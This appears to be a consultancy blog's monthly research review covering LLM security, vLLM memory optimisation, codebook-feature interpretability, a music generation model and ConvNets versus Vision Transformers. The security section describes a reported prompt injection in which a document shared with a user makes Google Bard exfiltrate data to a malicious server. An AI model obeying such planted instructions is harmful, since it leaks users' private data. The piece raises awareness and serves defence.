The Dark Sides of LLMs : Paths to Optimize and Explain Them

Updates on security, performance, or interpretability of language models; and as a bonus: generative AI in music, and the battle between convolutions and transformers.

#Security #Interpretability #Optimization #Language Models #Methodology

Download link for the article

If you only have a minute to read now, here are the key points of this article in 5 points :

Language models (especially chatGPT) have serious security vulnerabilities that must be addressed.
A new framework for optimizing language models has been released, addressing their memory consumption, which is crucial to consider.
A new work on interpretability of language models has been published by Stanford. It proposes to modify the fundamental architecture to more easily discover concepts within the model and then use them.
Researchers at Deepmind have demonstrated that, contrary to the current consensus, Vision Transformers are not "better" than convolutional networks for large datasets.
Researchers at Deepmind have demonstrated that, contrary to the current consensus, Vision Transformer are not "better" than convolutional networks for large datasets.

Why reading this article can be of concrete use to you?

Concretely, this article provides a strong alert about the security of language models, a new optimization framework for these models allowing significant cost savings on hardware, and promising new work on interpretability of these models. Additionally, it offers some general knowledge on generative AI in music, and a new step towards determining which architecture is most interesting in image processing.

What you can tell a colleague or your boss about it?

The dark side of LLMs at the moment is security, as many cases of content scraping are emerging. However, LLMs excel in their performance and cost of usage, particularly in the cloud, as well as in interpretability to make them no longer black boxes but to make their behavior more explainable.

In short, what key concepts will be covered?

Security of language models, especially ChatGPT / Google Bard
Optimizing language model usage through memory optimization
Interpretability of language models through design
Generative AI in music and the importance of datasets
Choosing between convolutional model or Vision Transformer in image processing. Vision Transformer en images.

Which business processes are likely to be modified based on this research?

The security of a service using a language model
The cost of using a language model
The choice of a fundamental model for an image processing task

The use cases we have developed for clients that relate to the topic of this research echo?

We have developed a classification system using language models (LLM) to assess the toxicity of messages posted on a high-volume internal messaging platform.

Our optimization efforts have enabled us to achieve a 30-fold reduction in processing time between the initial version and the currently operational version.

Regarding security, we have customized a language model installed on our client's servers to ensure that no data is transmitted over the web.

Here we go...

Like every month, we propose to present you with the academic research from the past month that we find interesting and useful for short-term deployment.

On the agenda:

(Low) security of language models like ChatGPT,
Low-level optimization of these models with a highly relevant new framework and a new interpretability work on these models from Stanford,
Following that, we will set aside language processing to introduce a new generative model in music.
War between Convolutional Networks and Vision Transformers.

Language models and cybersecurity: a disaster waiting to happen

Language models have been making headlines ever since the release of ChatGPT and other related works (LLAMs, Falcon, Mistral, etc.). More and more projects with our clients aim to leverage these tools to create new services utilizing natural language. While these models indeed represent a small revolution in terms of potential applications, it must be acknowledged that they are still too recent to be deployed confidently in an information system, or even to be used properly. We have already extensively discussed the challenges of industrializing a Deep Learning model, one of our daily battles. Here, we propose to focus on the cybersecurity issues of these models.

Indeed, cybersecurity doesn't mix very well with Deep Learning. Between model inversion, dataset poisoning, or adversarial attacks, the vectors of weakness for these models are numerous and still poorly understood by players in this field. But beyond that, the large language models open up a whole new field of risks that we didn't even suspect... At the root of the problem, once again, lies our limits of theoretical understanding of these models which are just, bluntly, "way too big" to be properly mastered.

The blog (https://embracethered.com/blog/posts/) recently caught our attention, focusing on these language model vulnerabilities and their consequences. While we recommend the entire blog, the last two articles are particularly enlightening.

Specifically : https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/

In this article, the author demonstrates that the automation allowing Bard (Google's LLM) to fetch information from the user's Google Documents makes it quite simple to perform an injection, notably by sharing a document with a user (an action that doesn't require validation from the victim!). This document contains a rewritten prompt of the LLM, which will then exfiltrate information to a malicious server... Below (from the blog) is the document in question :

One will note with a bit of humor that the requests from the "legal department" are very important 🙂. Beyond that, we find that controlling a model via prompt is a very weak and limited control, easily susceptible to exploitation. If you combine this approach with prompt obfuscation techniques (typically, the cypher presented in a recent research review), it will become nearly impossible to detect this type of attack. That said, let's give credit to Google for addressing this vulnerability (only in this specific form...).

And let's note that the author has raised similar issues with ChatGPT, which, according to OpenAI itself, will not be resolved:

https://embracethered.com/blog/posts/2023/advanced-plugin-data-exfiltration-trickery/

Optimization of language models has a new framework!

Second work (this time academic) that we want to present to you today: the optimization of language models, in learning or inference.

It's now a well-known problem for anyone who has tried to work with these models: their extreme heaviness makes their use very costly. Naively, we're talking (to train these models) about several particularly expensive A100 GPUs, and even their simple use (inference) incurs costs and burdens that are quite unbearable.

In Efficient Memory Management for Large Language Model Serving with PagedAttention by Kwon et al (Berkeley), the authors propose a refreshing approach to this problem and even offer a framework for application :

https://arxiv.org/abs/2309.06180

The fundamental idea of vLLM is to move away from the academic approach and delve back into computer science principles, particularly optimizing the use of GPU memory, which, to date, remains too simplistic. Among other problems highlighted by the authors, the fact that an LLM will allocate a contiguous memory block of maximum size required to generate the longest possible sentence for every prediction. However, in the majority of cases, this memory space will not be used at all. We are facing a classic problem of memory fragmentation where a significant portion of this memory is allocated (thus blocked) but unused. The authors are particularly interested in the KV Cache, which is a central element in optimizing Transformer-type models. The diagram below shows the different memory allocations, especially between Orca (a previous approach, here (caution) re-implemented by the authors) and their approach :

The diagram below illustrates the fragmentation issue with sentences during prediction :

Without delving too much into technical details, the authors propose implementing a block-based virtual memory manager, with logical virtual blocks corresponding to the operation of the LLM on one side, and physical blocks optimizing available memory on the other side.

They further develop this approach to demonstrate how to handle multiple requests in parallel, generate multiple predictions for the current sentence, or share blocks with equal prompts for the same problem (which is particularly relevant, as LLM usage is in most cases based on a constant prompt that repeats each time, especially when implementing a Chain of Thought) :

This type of work is beneficial in that it moves away from the "Deep Learning" paradigm to apply a certain "common sense" approach to development and computer optimization.

A bit more interpretability for LLMs

The interpretability of Deep Learning is still a fascinating and elusive topic, and we must follow relevant research in this field if we want to properly industrialize neural networks. Our latest research review addressed two interesting new works focused on language models. Stanford has recently published another piece that deserves proper attention, despite (as always :/) numerous limitations.

In Codebook Features: Sparse and Discrete Interpretability for Neural Networks by Tamkin and al [https://arxiv.org/abs/2310.17230], the authors revisit the goal of interpreting the intermediate values of the network "neurons" (without wording: the values resulting from the activation mechanisms). However, the fundamental problems have not changed: there are already too many values, and we know that it is the combination of certain activations that will need to be considered, further complicating (or even making impossible) this task.

Here, the authors propose a different approach by strongly constraining the structure of the neural network. The challenge is to replace the intermediate states containing "free" numerical values with a combination (by sum) of a finite number of static codes. The goal is therefore, through optimization, to replace the traditional layers with layers of Codebook Feature, containing these static codes and returning elements whose sum is as close as possible to the actual activation:

It's interesting for several reasons :

Firstly, we recall the work in the last research review where the authors learned sparse encoding of activations with interesting results. One can view this new work as a strong evolution. Whereas before, we started from these activations to discover the simplest possible combinations, here, the simplification is applied directly to the model.
This work is reminiscent of research on the VQ VAE (Vector Quantized Variational Autoencoder) which has yielded excellent results since 2017, for example in generative modeling (Stable DIffusion) for learning an exploitable latent space on images.

The challenge here is then to discover which concepts are modeled by which codes. The authors first work on a trivial case, then study a relatively simple language model. And they manage to identify concepts related to codes, but also to manipulate these codes to force the appearance of the concept in question in an ongoing prediction (diagram below where the code identifying dragons is added to every prediction).

What's interesting here is that the model is naturally much simpler to study due to its "quantification," but more importantly, this approach does not prevent the model from being an effective language model in the general sense. This approach is therefore particularly relevant, even though the models studied are still relatively simple compared to the very large models we usually deal with...

A bit of music in this rough world

Generative AI has definitely taken off in the world of images (and video is coming very soon, with the very recent release of the Video Diffusion Model), but its application to music remains more complex and much less satisfying. Therefore, any new work with relevant results deserves to be followed.

It's the case with the very recent MusTango by Melechovsky et al. [https://arxiv.org/abs/2311.08355]. We won't delve too much into the model itself, which follows the classics of Stable DIffusion: a VAE to transfer music into a simpler latent space, a diffusion model conditioned by text, and the good old Hi-Fi GAN to improve quality. No, the most interesting aspect here is probably the data management, which likely led to much better results than previous works.

Indeed, a fundamental challenge here is to have a large dataset of music coupled with rich and varied descriptive texts. While such a dataset exists "easily" for images, it is much more complex, if not impossible, to create in the music world. Internet contains far fewer annotated music samples than annotated images, and the quality of textual descriptions in music is also much lower than in images.

The authors here decided to create a new dataset freely accessible, following an approach similar to what we often do for our clients. Starting from MusicCaps (an original dataset), the authors generated descriptive texts based on detections: chord progressions, instruments, bpm. They also "augmented" the dataset by modifying music samples (tempo variations, pitch variations, etc.). ChatGPT was finally used to create variations of natural language descriptions based on the detected values...

The CNN/ViT war continues! (or beware of the academy, chapter 289)

Since 2020, a new model architecture has emerged to handle images, the now-famous Vision Transformer, adopting the fundamental architecture that has proven successful in natural language processing. And since then, the vast majority of researchers have shifted to these new models, abandoning the good old convolutional models that we have been using since 2012.

The argument for switching models has long been that the Vision Transformer was much more effective. However, the ViT was indeed considered more effective, but only on very large datasets like Google's JFT-210M, which contains 210 million annotated images. Let's remember that this paradigm is far from the reality of our projects, where our clients' datasets rarely exceed one million elements. Also, since 2020, several works (such as https://arxiv.org/abs/2201.09792 or https://arxiv.org/abs/2201.03545) have criticized this understanding by proposing convolutional architectures that perform equally well with Vision Transformers.

The academic consensus has long been that Vision Transformer were much better at scaling, i.e., handling larger datasets, but, on the other hand, for a more classical problem, convolutional networks were roughly equivalent. Hence came the trend of having ViT models pre-trained on massive datasets and then adapting them to more applied cases with less data...

It is worth noting that we continue, when appropriate, to use convolutional architectures for our clients. Indeed, these architectures have a much more solid track record, making their manipulation, control, and analysis (interpretability?) much more effective. It's better to lose a few percentage points of quality in exchange for a lighter and better-constrained model, once we step out of the academic paradigm (where state-of-the-art research prevails) to develop useful tools.

Well, this war has just seen a new confrontation, and it's no small matter as it comes directly from Deepmind, a key player and influencer in the field. In the short paper ConvNets Match Vision Transformers at Scale by Smith et al [https://arxiv.org/abs/2310.16764], the authors challenge this belief and demonstrate that convolutional networks can be perfectly competitive with Vision Transformers on large datasets. While these findings are not intended to be directly applied (unless one of our clients unlocks a budget of several hundred thousand euros for training), it serves as a reminder of the approach to take in Deep Learning: we want to keep up with research, but always maintain enough perspective not to rush into "trends" whose cost is not justified by the quality of the tools generated.

Blog

Research Echoes #9